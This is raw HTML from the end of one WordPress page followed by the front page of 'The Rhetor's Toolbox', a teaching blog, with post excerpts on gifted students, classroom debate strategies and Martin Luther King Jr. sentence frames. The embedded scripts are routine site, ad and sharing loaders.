{"show_facebook":"1","show_twitter":"1","show_linkedin":"","show_pinterest":"","show_email":"","twitter_username":"","mobile":"","content":".has-content-area,.has-excerpt-area","tweet_text":"Tweet","facebook_text":"Share","linkedin_text":"LinkedIn","pinterest_text":"Pinterest","email_text":"E-mail","icons":"1","facebook_app_id":"0","email_url":"http:\/\/www.psychedinsanfrancisco.com?action=has_email&nonce=17308b63fe&title=%title%&url=%url%"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.psychedinsanfrancisco.com/wp-content/plugins/highlight-and-share/js/highlight-and-share.js?ver=20170112'></script> <script type='text/javascript' src='http://www.psychedinsanfrancisco.com/wp-content/themes/bb-theme/js/jquery.throttle.min.js?ver=1.5.1'></script> <script type='text/javascript' src='http://www.psychedinsanfrancisco.com/wp-content/plugins/bb-plugin/js/jquery.magnificpopup.min.js?ver=1.8'></script> <script type='text/javascript' src='http://www.psychedinsanfrancisco.com/wp-content/themes/bb-theme/js/bootstrap.min.js?ver=1.5.1'></script> <script type='text/javascript' src='http://www.psychedinsanfrancisco.com/wp-content/themes/bb-theme/js/theme.js?ver=1.5.1'></script> <script type='text/javascript' src='http://www.psychedinsanfrancisco.com/wp-includes/js/wp-embed.min.js?ver=4.7.13'></script> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=1402038253368883&version=v2.3"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <script type="text/javascript"> jQuery(function() { jQuery(".tooltips img").closest(".tooltips").css("display", "inline-block"); new jQuery.Zebra_Tooltips(jQuery('.tooltips').not('.custom_m_bubble'), { 'background_color': '#000000', 'color': '#ffffff', 'max_width': 300, 'opacity': .95, 'position': 'center' }); }); </script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" itemscope itemtype="http://schema.org/WebPage"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://rhetorstoolbox.com/xmlrpc.php"> <title>The Rhetor&#039;s Toolbox &#8211; Resources for connection, collaboration, critical thinking, and cultivating learning in the ELA classroom</title> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="The Rhetor&#039;s Toolbox &raquo; Feed" href="https://rhetorstoolbox.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="The Rhetor&#039;s Toolbox &raquo; Comments Feed" href="https://rhetorstoolbox.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/rhetorstoolbox.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://rhetorstoolbox.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='ixion-style-css' href='https://rhetorstoolbox.com/wp-content/themes/ixion/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='ixion-blocks-css' href='https://rhetorstoolbox.com/wp-content/themes/ixion/blocks.css?ver=5.2' type='text/css' media='all' /> <link crossorigin="anonymous" rel='stylesheet' id='ixion-fonts-archivo-css' href='//fonts.googleapis.com/css?family=Archivo+Narrow%3A400%2C400i%2C700%2C700i&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='ixion-fonts-cooper-css' href='https://rhetorstoolbox.com/wp-content/themes/ixion/assets/fonts/cooperhewitt.css' type='text/css' media='all' /> <link rel='stylesheet' id='genericons-css' href='https://rhetorstoolbox.com/wp-content/plugins/jetpack/_inc/genericons/genericons/genericons.css?ver=3.1' type='text/css' media='all' /> <link rel='stylesheet' id='ixion-wpcom-css' href='https://rhetorstoolbox.com/wp-content/themes/ixion/inc/style-wpcom.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='social-logos-css' href='https://rhetorstoolbox.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://rhetorstoolbox.com/wp-content/plugins/jetpack/css/jetpack.css?ver=7.3.1' type='text/css' media='all' /> <script type='text/javascript' src='https://rhetorstoolbox.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://rhetorstoolbox.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='https://rhetorstoolbox.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://rhetorstoolbox.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://rhetorstoolbox.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://wp.me/7QlHJ' /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <style type='text/css'>img#wpstats{display:none}</style> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="The Rhetor&#039;s Toolbox" /> <meta property="og:description" content="Resources for connection, collaboration, critical thinking, and cultivating learning in the ELA classroom" /> <meta property="og:url" content="https://rhetorstoolbox.com/" /> <meta property="og:site_name" content="The Rhetor&#039;s Toolbox" /> <meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /> <meta property="og:locale" content="en_US" /> <!-- End Jetpack Open Graph Tags --> <script type="text/javascript"> var __ATA_PP = { pt: 0, ht: 2, tn: 'ixion', amp: false, siteid: 115910843, consent: 0 }; var __ATA = __ATA || {}; __ATA.cmd = __ATA.cmd || []; __ATA.criteo = __ATA.criteo || {}; __ATA.criteo.cmd = __ATA.criteo.cmd || []; </script> <link rel='dns-prefetch' href='//s.pubmine.com' /> <link rel='dns-prefetch' href='//x.bidswitch.net' /> <link rel='dns-prefetch' href='//static.criteo.net' /> <link rel='dns-prefetch' href='//ib.adnxs.com' /> <link rel='dns-prefetch' href='//aax.amazon-adsystem.com' /> <link rel='dns-prefetch' href='//bidder.criteo.com' /> <link rel='dns-prefetch' href='//cas.criteo.com' /> <link rel='dns-prefetch' href='//gum.criteo.com' /> <link rel='dns-prefetch' href='//ads.pubmatic.com' /> <link rel='dns-prefetch' href='//gads.pubmatic.com' /> <link rel='dns-prefetch' href='//tpc.googlesyndication.com' /> <link rel='dns-prefetch' href='//ad.doubleclick.net' /> <link rel='dns-prefetch' href='//googleads.g.doubleclick.net' /> <link rel='dns-prefetch' href='//www.googletagservices.com' /> <script async type="text/javascript" src="//s.pubmine.com/head.js"></script><link rel="icon" href="https://en.wordpress.com/i/webclip.png" sizes="32x32" /> <link rel="icon" href="https://en.wordpress.com/i/webclip.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://en.wordpress.com/i/webclip.png" /> <meta name="msapplication-TileImage" content="https://en.wordpress.com/i/webclip.png" /> <div class="wpcnt wpcnt-header"> <div class="wpa"> <span class="wpa-about">Advertisements</span> <div class="u top"> <div style="padding-bottom:15px;width:728px;height:90px;"> <div id="atatags-1-5cdd8c349d6ec"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-1-5cdd8c349d6ec', { collapseEmpty: 'before', sectionId: '1159108432', location: 110, width: 728, height: 90 }); }); </script> </div> </div> </div> </div> </div></head> <body class="home blog wp-custom-logo wp-embed-responsive hfeed has-cta-button has-description no-featured-posts"> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <header id="masthead" class="site-header" role="banner"> <div class="utility-container"> <form role="search" method="get" class="search-form" action="https://rhetorstoolbox.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /> <span class="search-form-icon"></span> </label> <input type="submit" class="search-submit" value="Search" /> </form> </div> <div class="branding-container"> <div class="site-branding"> <a href="https://rhetorstoolbox.com/" class="custom-logo-link" rel="home"><img width="288" height="288" src="https://rhetorstoolbox.com/wp-content/uploads/2017/02/cropped-logo-for-blog.png" class="custom-logo" alt="The Rhetor&#039;s Toolbox" /></a> <h1 class="site-title"><a href="https://rhetorstoolbox.com/" rel="home">The Rhetor&#039;s Toolbox</a></h1> </div><!-- .site-branding --> <nav id="site-navigation" class="main-navigation" role="navigation"> <button class="menu-toggle" aria-controls="top-menu" aria-expanded="false">Menu</button> <div id="top-menu" class="menu"><ul> <li class="page_item page-item-776"><a href="https://rhetorstoolbox.com/essential-tools-for-teaching-rhetoric/">Essential Tools for Teaching Rhetoric</a></li> <li class="page_item page-item-2"><a href="https://rhetorstoolbox.com/about/">About</a></li> <li class="page_item page-item-3"><a href="https://rhetorstoolbox.com/contact/">Contact</a></li> </ul></div> </nav> </div> </header> <div class="front-page-wrapper"> <div class="header-overlay"> <div class="site-description-wrapper"> <p class="site-description">Resources for connection, collaboration, critical thinking, and cultivating learning in the ELA classroom</p> <a href="https://www.teacherspayteachers.com/Store/The-Rhetors-Toolbox" class="button callout-button">Teachers pay teachers store</a> </div><!-- .site-description-wrapper --> </div><!-- .header-overlay --> </div><!-- .front-page-wrapper --> <div id="content" class="site-content"> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <article id="post-952" class="post-952 post type-post status-publish format-standard hentry category-teaching tag-advanced tag-classroom-management tag-gifted-and-talented tag-instruction tag-learning tag-teaching-strategies tag-time tag-waiting no-featured-image"> <div class="entry-body"> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/" rel="bookmark"><time class="entry-date published" datetime="2019-04-07T16:08:40-06:00">April 7, 2019</time><time class="updated" datetime="2019-04-07T17:00:34-06:00">April 7, 2019</time></a></span> <span class="byline"><span class="author vcard"><a class="url fn n" href="https://rhetorstoolbox.com/author/rhetorstoolbox/">rhetorstoolbox</a></span></span> <span class="cat-links"><a href="https://rhetorstoolbox.com/category/teaching/" rel="category tag">Teaching</a></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/" rel="bookmark">No Time to Wait</a></h2> </header> <div class="entry-content"> <p>It's a pedagogical imperative: we must make sure our high-aptitude, high-achieving students are not stuck waiting to learn. </p><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-952" class="share-twitter sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-952" class="share-facebook sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/?share=email" target="_blank" title="Click to email this to a friend"><span></span><span class="sharing-screen-reader-text">Click to email this to a friend (Opens in new window)</span></a></li><li class="share-print"><a rel="nofollow noopener noreferrer" data-shared="" class="share-print sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/" target="_blank" title="Click to print"><span></span><span class="sharing-screen-reader-text">Click to print (Opens in new window)</span></a></li><li class="share-pinterest"><a rel="nofollow noopener noreferrer" data-shared="sharing-pinterest-952" class="share-pinterest sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/?share=pinterest" target="_blank" title="Click to share on Pinterest"><span></span><span class="sharing-screen-reader-text">Click to share on Pinterest (Opens in new window)</span></a></li><li><a href="#" class="sharing-anchor sd-button share-more"><span>More</span></a></li><li class="share-end"></li></ul><div class="sharing-hidden"><div class="inner" style="display: none;"><ul><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-952" class="share-linkedin sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/?share=linkedin" target="_blank" title="Click to share on LinkedIn"><span></span><span class="sharing-screen-reader-text">Click to share on LinkedIn (Opens in new window)</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/?share=reddit" target="_blank" title="Click to share on Reddit"><span></span><span class="sharing-screen-reader-text">Click to share on Reddit (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-tumblr"><a rel="nofollow noopener noreferrer" data-shared="" class="share-tumblr sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/?share=tumblr" target="_blank" title="Click to share on Tumblr"><span></span><span class="sharing-screen-reader-text">Click to share on Tumblr (Opens in new window)</span></a></li><li class="share-pocket"><a rel="nofollow noopener noreferrer" data-shared="" class="share-pocket sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/?share=pocket" target="_blank" title="Click to share on Pocket"><span></span><span class="sharing-screen-reader-text">Click to share on Pocket (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/?share=telegram" target="_blank" title="Click to share on Telegram"><span></span><span class="sharing-screen-reader-text">Click to share on Telegram (Opens in new window)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp"><span></span><span class="sharing-screen-reader-text">Click to share on WhatsApp (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-952" class="share-skype sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/04/07/no-time-to-wait/?share=skype" target="_blank" title="Click to share on Skype"><span></span><span class="sharing-screen-reader-text">Click to share on Skype (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div></div></div> </div><!-- .entry-content --> </div> <!-- .entry-body --> </article><!-- #post-## --> <article id="post-563" class="post-563 post type-post status-publish format-standard hentry category-lesson-planning category-teaching tag-argument tag-debate tag-rhetorical-strategies no-featured-image"> <div class="entry-body"> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/" rel="bookmark"><time class="entry-date published" datetime="2019-02-23T07:00:20-06:00">February 23, 2019</time><time class="updated" datetime="2018-12-25T14:00:44-06:00">December 25, 2018</time></a></span> <span class="byline"><span class="author vcard"><a class="url fn n" href="https://rhetorstoolbox.com/author/rhetorstoolbox/">rhetorstoolbox</a></span></span> <span class="cat-links"><a href="https://rhetorstoolbox.com/tag/lesson-planning/" rel="category tag">Lesson Planning</a>, <a href="https://rhetorstoolbox.com/category/teaching/" rel="category tag">Teaching</a></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/" rel="bookmark">Three Low-Prep Classroom Debate Strategies That Rock</a></h2> </header> <div class="entry-content"> <p>One of the best ways to get students engaged and practicing rhetorical strategies is to get them up and talking. The more they can be opinionated, the better! Here are three of my favorite low-prep debate strategies, perfect for any time during the school year. Four Corners Debates Prep: Make four signs: strongly agree, agree, &hellip; <a href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/" class="more-link">Continue reading <span class="screen-reader-text">Three Low-Prep Classroom Debate Strategies That Rock</span></a></p> <div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-563" class="share-twitter sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-563" class="share-facebook sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/?share=email" target="_blank" title="Click to email this to a friend"><span></span><span class="sharing-screen-reader-text">Click to email this to a friend (Opens in new window)</span></a></li><li class="share-print"><a rel="nofollow noopener noreferrer" data-shared="" class="share-print sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/" target="_blank" title="Click to print"><span></span><span class="sharing-screen-reader-text">Click to print (Opens in new window)</span></a></li><li class="share-pinterest"><a rel="nofollow noopener noreferrer" data-shared="sharing-pinterest-563" class="share-pinterest sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/?share=pinterest" target="_blank" title="Click to share on Pinterest"><span></span><span class="sharing-screen-reader-text">Click to share on Pinterest (Opens in new window)</span></a></li><li><a href="#" class="sharing-anchor sd-button share-more"><span>More</span></a></li><li class="share-end"></li></ul><div class="sharing-hidden"><div class="inner" style="display: none;"><ul><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-563" class="share-linkedin sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/?share=linkedin" target="_blank" title="Click to share on LinkedIn"><span></span><span class="sharing-screen-reader-text">Click to share on LinkedIn (Opens in new window)</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/?share=reddit" target="_blank" title="Click to share on Reddit"><span></span><span class="sharing-screen-reader-text">Click to share on Reddit (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-tumblr"><a rel="nofollow noopener noreferrer" data-shared="" class="share-tumblr sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/?share=tumblr" target="_blank" title="Click to share on Tumblr"><span></span><span class="sharing-screen-reader-text">Click to share on Tumblr (Opens in new window)</span></a></li><li class="share-pocket"><a rel="nofollow noopener noreferrer" data-shared="" class="share-pocket sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/?share=pocket" target="_blank" title="Click to share on Pocket"><span></span><span class="sharing-screen-reader-text">Click to share on Pocket (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/?share=telegram" target="_blank" title="Click to share on Telegram"><span></span><span class="sharing-screen-reader-text">Click to share on Telegram (Opens in new window)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp"><span></span><span class="sharing-screen-reader-text">Click to share on WhatsApp (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-563" class="share-skype sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/02/23/three-low-prep-classroom-debate-strategies-that-rock/?share=skype" target="_blank" title="Click to share on Skype"><span></span><span class="sharing-screen-reader-text">Click to share on Skype (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div></div></div> </div><!-- .entry-content --> </div> <!-- .entry-body --> </article><!-- #post-## --> <article id="post-859" class="post-859 post type-post status-publish format-standard hentry category-ap-language-and-composition category-culturally-responsive-teaching category-current-events category-essay category-rhetoric category-teaching category-writing no-featured-image"> <div class="entry-body"> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/" rel="bookmark"><time class="entry-date published" datetime="2019-01-12T07:00:20-06:00">January 12, 2019</time><time class="updated" datetime="2018-12-25T16:25:11-06:00">December 25, 2018</time></a></span> <span class="byline"><span class="author vcard"><a class="url fn n" href="https://rhetorstoolbox.com/author/rhetorstoolbox/">rhetorstoolbox</a></span></span> <span class="cat-links"><a href="https://rhetorstoolbox.com/category/ap-language-and-composition/" rel="category tag">AP Language and Composition</a>, <a href="https://rhetorstoolbox.com/category/culturally-responsive-teaching/" rel="category tag">Culturally Responsive Teaching</a>, <a href="https://rhetorstoolbox.com/category/current-events/" rel="category tag">Current Events</a>, <a href="https://rhetorstoolbox.com/category/essay/" rel="category tag">Essay</a>, <a href="https://rhetorstoolbox.com/category/rhetoric/" rel="category tag">Rhetoric</a>, <a href="https://rhetorstoolbox.com/category/teaching/" rel="category tag">Teaching</a>, <a href="https://rhetorstoolbox.com/category/writing/" rel="category tag">Writing</a></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/" rel="bookmark">Five Sentence Structures Every Student Should Adapt From Martin Luther King, Jr.</a></h2> </header> <div class="entry-content"> <p>Imitation exercises are one of my favorite ways to teach students sophisticated writing. In honor of Dr. Martin Luther King, Jr.'s powerful rhetoric, I pulled five incredible quotes from his speeches and writings and created sentence frames that students could use with their own content. If you'd like this in handout form, I included this &hellip; <a href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/" class="more-link">Continue reading <span class="screen-reader-text">Five Sentence Structures Every Student Should Adapt From Martin Luther King, Jr.</span></a></p><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-859" class="share-twitter sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-859" class="share-facebook sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/?share=email" target="_blank" title="Click to email this to a friend"><span></span><span class="sharing-screen-reader-text">Click to email this to a friend (Opens in new window)</span></a></li><li class="share-print"><a rel="nofollow noopener noreferrer" data-shared="" class="share-print sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/" target="_blank" title="Click to print"><span></span><span class="sharing-screen-reader-text">Click to print (Opens in new window)</span></a></li><li class="share-pinterest"><a rel="nofollow noopener noreferrer" data-shared="sharing-pinterest-859" class="share-pinterest sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/?share=pinterest" target="_blank" title="Click to share on Pinterest"><span></span><span class="sharing-screen-reader-text">Click to share on Pinterest (Opens in new window)</span></a></li><li><a href="#" class="sharing-anchor sd-button share-more"><span>More</span></a></li><li class="share-end"></li></ul><div class="sharing-hidden"><div class="inner" style="display: none;"><ul><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-859" class="share-linkedin sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/?share=linkedin" target="_blank" title="Click to share on LinkedIn"><span></span><span class="sharing-screen-reader-text">Click to share on LinkedIn (Opens in new window)</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/?share=reddit" target="_blank" title="Click to share on Reddit"><span></span><span class="sharing-screen-reader-text">Click to share on Reddit (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-tumblr"><a rel="nofollow noopener noreferrer" data-shared="" class="share-tumblr sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/?share=tumblr" target="_blank" title="Click to share on Tumblr"><span></span><span class="sharing-screen-reader-text">Click to share on Tumblr (Opens in new window)</span></a></li><li class="share-pocket"><a rel="nofollow noopener noreferrer" data-shared="" class="share-pocket sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/?share=pocket" target="_blank" title="Click to share on Pocket"><span></span><span class="sharing-screen-reader-text">Click to share on Pocket (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/?share=telegram" target="_blank" title="Click to share on Telegram"><span></span><span class="sharing-screen-reader-text">Click to share on Telegram (Opens in new window)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp"><span></span><span class="sharing-screen-reader-text">Click to share on WhatsApp (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-859" class="share-skype sd-button share-icon no-text" 